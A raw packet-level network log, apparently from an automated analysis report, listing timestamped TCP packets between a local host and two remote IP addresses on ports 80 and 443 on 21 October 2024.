                                          Oct 21, 2024 08:25:12.318262100 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.437423944 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.437444925 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.437460899 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.437472105 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.437482119 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.437505960 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.437505960 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.437506914 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.437601089 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.442065001 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.442075014 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.442125082 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.442135096 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.442167044 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.442167044 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.442348957 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.442358971 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.442368984 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.442378998 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.442399979 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.442430019 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.442847013 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.442856073 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.442898989 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.557672977 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.557696104 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.557708025 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.557718039 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.557729959 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.557859898 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.557859898 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.557859898 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.562184095 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.562194109 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.562205076 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.562242985 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.562279940 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.562303066 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.562344074 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.562350035 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.562354088 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.562398911 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.565676928 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.565696001 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.565728903 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.565730095 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.602674007 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.602710962 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.602716923 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.602721930 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.603013992 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.677680016 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.677697897 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.677714109 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.677725077 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.677737951 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.677923918 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.677923918 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.682281971 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.682292938 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.682302952 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.682313919 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.682394981 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.685684919 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.685704947 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.685715914 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.685755968 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.685755968 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.722908020 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.722927094 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.722948074 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.722958088 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.723062992 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.723138094 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.797547102 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.797564983 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.797575951 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.797585964 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.797600031 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.797755003 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.797755003 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.802192926 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.802370071 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.802381992 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.802392960 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.802428961 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.802460909 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.805583954 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.805640936 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.805651903 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.805691004 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.842737913 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.842747927 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.842757940 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.842920065 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.842920065 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.842966080 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.842976093 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.843030930 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.917577028 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.917598963 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.917610884 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.917620897 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.917633057 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.917644978 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.917804956 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.917804956 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.922257900 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.922269106 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.922278881 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.922290087 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.922419071 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.925401926 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.925465107 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.925467014 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.925520897 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.962690115 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.962714911 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.962759018 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.962769985 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.962780952 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.962793112 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.962941885 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.962941885 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.037400007 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.037415981 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.037426949 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.037528992 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.037539005 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.037549019 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.037693977 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.037693977 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.042068005 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.042083025 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.042092085 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.042145014 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.042145014 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.045414925 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.045433998 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.045444012 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.045473099 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.045473099 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.082614899 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.082627058 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.082643032 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.082710981 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.082710981 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.082756042 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.082767963 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.082781076 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.082815886 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.082854986 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.083108902 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.083120108 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.083169937 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.162672043 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.162694931 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.162707090 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.162717104 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.162727118 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.162738085 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.162811995 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.162893057 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.163005114 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.163013935 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.163064003 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.165293932 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.165333033 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.165364027 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.165373087 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.165385008 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.165410042 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.202656031 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.202671051 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.202691078 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.202703953 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.202714920 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.202728033 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.202774048 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.202855110 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.246814966 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.246828079 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.246840954 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.246972084 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.277245045 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.277256966 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.277307987 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.277316093 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.277343988 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.277379990 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.282526016 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.282535076 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.282588005 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.282644033 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.282655001 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.282665968 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.282676935 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.282713890 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.282713890 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.285322905 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.285372972 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.285382986 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.285392046 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.285425901 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.285456896 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.322770119 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.322812080 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.322823048 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.322839022 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.322851896 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.322899103 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.322937965 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.366717100 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.366743088 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.366754055 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.366785049 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.366823912 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.397138119 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.397149086 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.397195101 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.397205114 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.397206068 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.397253990 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.397253990 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.402600050 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.402616978 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.402626991 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.402669907 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.402702093 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.405245066 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.405256033 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.405267000 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.405299902 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.405328989 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.405391932 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.405402899 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.405412912 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.405442953 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.405472040 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.442629099 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.442641020 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.442651033 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.442693949 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.442725897 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.442780018 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.442790031 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.442800045 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.442835093 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.442863941 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.486696959 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.486709118 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.486720085 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.486785889 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.517318964 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.517330885 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.517340899 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.517410994 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.522480011 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.522497892 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.522552013 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.522658110 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.522701025 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.522710085 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.525343895 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.525355101 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.525372028 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.525382042 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.525393009 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.525404930 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.525435925 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.525435925 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.525435925 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.562716007 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.562730074 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.562740088 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.562751055 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.562817097 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.562874079 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.562882900 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.562896013 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.562906027 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.562917948 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.562921047 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.562938929 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.562956095 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.606622934 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.606646061 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.606827974 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.637280941 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.637290955 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.637295961 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.637566090 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.642432928 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.642452002 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.642461061 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.642493963 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.642550945 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.645229101 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.645272017 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.645281076 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.645339012 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.645360947 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.645370007 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.645380974 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.645437956 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.645437956 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.645751953 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.645813942 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.682518005 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.682528973 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.682590961 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.682637930 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.682648897 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.682661057 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.682672024 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.682696104 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.682725906 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.683130980 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.683140993 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.683156013 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.683192968 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.683193922 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.757251978 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.757262945 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.757268906 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.757273912 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.757498026 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.757524014 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.757529974 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.757606030 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:13.762455940 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.762465954 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:13.762510061 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:14.318531036 CEST64703443192.168.2.5104.26.13.205
                                          Oct 21, 2024 08:25:14.318569899 CEST44364703104.26.13.205192.168.2.5
                                          Oct 21, 2024 08:25:14.318653107 CEST64703443192.168.2.5104.26.13.205
                                          Oct 21, 2024 08:25:14.332398891 CEST64703443192.168.2.5104.26.13.205
                                          Oct 21, 2024 08:25:14.332422972 CEST44364703104.26.13.205192.168.2.5
                                          Oct 21, 2024 08:25:14.954675913 CEST44364703104.26.13.205192.168.2.5
                                          Oct 21, 2024 08:25:14.954814911 CEST64703443192.168.2.5104.26.13.205
                                          Oct 21, 2024 08:25:14.956661940 CEST64703443192.168.2.5104.26.13.205
                                          Oct 21, 2024 08:25:14.956675053 CEST44364703104.26.13.205192.168.2.5
                                          Oct 21, 2024 08:25:14.957075119 CEST44364703104.26.13.205192.168.2.5
                                          Oct 21, 2024 08:25:15.009852886 CEST64703443192.168.2.5104.26.13.205
                                          Oct 21, 2024 08:25:15.018683910 CEST64703443192.168.2.5104.26.13.205
                                          Oct 21, 2024 08:25:15.059446096 CEST44364703104.26.13.205192.168.2.5
                                          Oct 21, 2024 08:25:15.204781055 CEST44364703104.26.13.205192.168.2.5
